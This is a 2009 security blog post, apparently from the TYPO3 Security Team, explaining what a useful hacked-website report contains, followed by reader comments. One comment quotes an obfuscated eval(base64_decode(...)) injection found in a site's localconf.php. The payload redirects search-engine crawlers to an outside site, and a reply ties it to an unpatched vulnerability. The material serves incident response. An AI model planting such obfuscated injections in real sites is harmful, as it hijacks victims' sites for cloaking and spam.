about
blog
tutorials
How not to report a security incident
Posted on May 14, 2009 by .
Have a look, I got hacked.
Your TYPO3 website has been hacked and you need quick help? Well, then help us too.
A report like following reached the TYPO3 Security Team:
Hi guys,
have a look at http://example.org/path/to/website/defacement/, I got hacked.
I hope you see what's wrong here. There's no additional information. This guy is only reporting the impact of a hack. There's no way to help you with this information; furthermore such report doesn't help the TYPO3 community either as our team is unable to analyze it.
The right way:
In short, collect as much information as possible!
In detail:
- What happened?
What's the impact of the hack? Defacement; your website suddenly delivers malware; there's a new backend user "blackhat"? - When has it happened?
When did you recognize the hack? By analyzing the logfiles, when do you estimate did the attacker succeed with his hack? - How have you became aware of the hack?
You clients reported malware on your site? You were getting from google to your website and it looks different (with all those links to vi**ra pills). - Where has it happened?
on a dedicated server (rootserver, virtual server), on a virtual hosting shared together with other hosting provider customers; is there any other software installed that might be vulnerable - Strange data or behaviour?
different website output when accessing the website directly (through a bookmark) or via referrer (directed to from a search engine); new not TYPO3 related files (webshell.pl) - What kind of software is installed?
TYPO3 version, list of installed extensions with version numbers (are they up to date); is your server up to date with all those TYPO3 Security advisories - Is your local client safe?
did you check your local client with at least two different malware scanners; did you recently access your website via insecure wireless lan; how do you transfer data to your server (via insecure ftp, sftp, scp)
Data you should and we are interested in:
TYPO3 sys_log table entries, web server access logs, PHP error logs, modsecurity logs, list of unexpected files or files with a strange access/modification time, OS logs (auth, audit, messages, secure), IDS logs, AIDE/tripwire reports
Bonus:
You have already analyzed the complete hack and are now able to report the exact attacker's entry point. Great, your place in the top ten of "best vulnerability reports" is guaranteed. But we're sorry, first rank is already given away! ;-)
- 2 Comment(s)
web
typo3 4.0.2
localconf.php contains text:
echo ".eval(base64_decode('JGFnZW50ID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOyBpZiAoZXJlZ2koImdvb2dsZSIs
JGFnZW50KXxlcmVnaSgic2x1cnAiLCAkYWdlbnQpfGVyZWdpKCJtc24iLCAkYWdlbnQpKSB7aGVh
ZGVyKCJIVFRQLzEuMSAzMDEiKTsgaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3AxcDMubmV0LyIp
OyBleGl0KCk7IH0=')).";
which evaluates to script redirecting search bots to other sites.
The access to the server and backend seems to be secure.
Please let me know how this may have happened.
Re: web
If you're really using TYPO3 version 4.0.2, you've missed several updates, also those that fix known vulnerabilities.
The latest (and last) version of the 4.0 branch is version 4.0.13.
One vulnerability (see advisory TYPO3-SA-2009-002:http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/) covers a vulnerability that allowed remote users to write to localconf.php file.
So my advice is to update to 4.0.13.
Let me adjust that branch 4.0 has reached end of support, and branch 4.1 will reach end of support in November 2009.
Better upgrade to TYPO3 version 4.2.10 (http://typo3.org/download/packages/) as soon as possible!